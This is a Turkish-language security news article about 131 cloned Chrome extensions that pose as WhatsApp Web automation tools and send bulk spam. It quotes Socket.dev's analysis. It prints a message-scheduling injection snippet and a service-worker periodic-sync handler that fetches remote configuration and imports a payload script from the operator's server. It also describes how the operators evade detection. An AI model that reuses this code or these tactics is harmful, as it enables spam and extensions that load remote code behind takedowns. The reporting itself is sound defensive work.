Geçtiğimiz birkaç ay boyunca siber güvenlik araştırmacıları, meşru WhatsApp Web otomasyon araçları gibi görünen sahte Chrome uzantılarında bir artış gözlemledi.
Her biri farklı teklifler olarak sunulan bu 131 adet yeniden markalanmış klon, kullanıcının izni olmadan toplu mesajlaşmayı ve planlamayı otomatikleştirmek için tasarlanmış aynı kod tabanını paylaşıyor.
Özel komut dosyalarını doğrudan WhatsApp Web arayüzüne enjekte eden uzantılar, yerel hız sınırlarını ve istenmeyen posta önleme önlemlerini atlıyor.
Her listede mesaj şablonları, planlama kontrolleri ve analiz panoları gibi özelliklerin reklamı yapılıyor; bu özellikler özellikle WhatsApp’ın müşteriye ulaşma açısından kritik önem taşıdığı Brezilya’daki küçük işletmelerin ilgisini çekiyor.
Uzantılar, arka plan görevlerini yürütmek ve açık kullanıcı etkileşimi olmadan toplu gönderimleri planlamak için Chrome’un Manifest V3 hizmet çalışanı özelliklerinden yararlanıyor.
.webp)
Socket.dev analistleri, çekirdek modülün aşağıdaki gibi bir kod pasajından yararlandığını belirtti:
document.addEventListener('DOMContentLoaded', () => {
const msgHelper = window.WPP.helpers.sendMessage;
scheduledMessages.forEach(({contact, text, time}) => {
setTimeout(() => msgHelper(contact, text), time);
});
});Bu enjeksiyon, sayfanın DOM’sine eklenir ve WhatsApp’ın dahili API’lerini çağırarak meşru otomasyon ile kötü amaçlı spam kampanyaları arasındaki çizgiyi bulanıklaştırır.
Socket.dev araştırmacıları, hizmet çalışanının, operatörün altyapısında barındırılan uzak bir yapılandırma dosyasını getirdiğini, bunun mesaj kalıplarında dinamik güncellemeler sağladığını ve algılamayı atlatmak için parametreleri kısıtladığını belirledi.
Yinelenen deneyimleri ve yetkisiz mesajlaşmayı yasaklayan Chrome Web Mağazası politikalarına rağmen, Ekim 2025’in ortası itibarıyla 131 uzantının tümü yayında kaldı.
Her klon, gizlilik uyumluluğu ve sıkı kod denetimleri güvencesi içeren parlak açılış sayfaları altında pazarlanmaktadır; bu iddialar, platform yönergeleriyle çelişmektedir.
Uzantılar, franchise benzeri bir bayi programı aracılığıyla dağıtılır: iş ortakları, aracı lisanslamak, özel bir markalama paketi almak ve abonelik planlarını yönetmek için ön ücret öderken, orijinal operatör arka uç üzerindeki kontrolü elinde tutar.
Kaçınma ve Kalıcılık Taktikleri
Bu kampanyanın en karmaşık yönü, tespitten kaçınma stratejisinde yatmaktadır. Operatörler, gönderme aralıklarını ayarlayarak, mesaj içeriğini rastgele hale getirerek ve yayıncı hesaplarını dönüşümlü olarak yayından kaldırma taleplerine rağmen kesintisiz operasyonları sürdürür.
Önemli bir kalıcılık taktiği, düzenli aralıklarla güncellenmiş JavaScript verileri için operatörün sunucusunun yoklanmasını içerir: –
self.addEventListener('periodicsync', event => {
event.waitUntil(
fetch(configUrl)
.then(response => response.json())
.then(cfg => importScripts(cfg.payloadUrl))
);
});Bu Manifest V3 periyodik senkronizasyon kaydı, Chrome belirli bir veriyi işaretlese bile uzantının işaretlenmemiş bir sürümü uzak sunucudan yeniden yükleyebilmesini sağlar.
Kampanya, çeşitli adlandırma kuralları ve listelerdeki binlerce aktif kullanıcıyla birleştiğinde, politikanın kötüye kullanımına geniş ölçekte örnek teşkil ediyor ve gelişmiş uzantı yönetimi ve kullanıcı dikkatliliğine olan ihtiyacın altını çiziyor.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
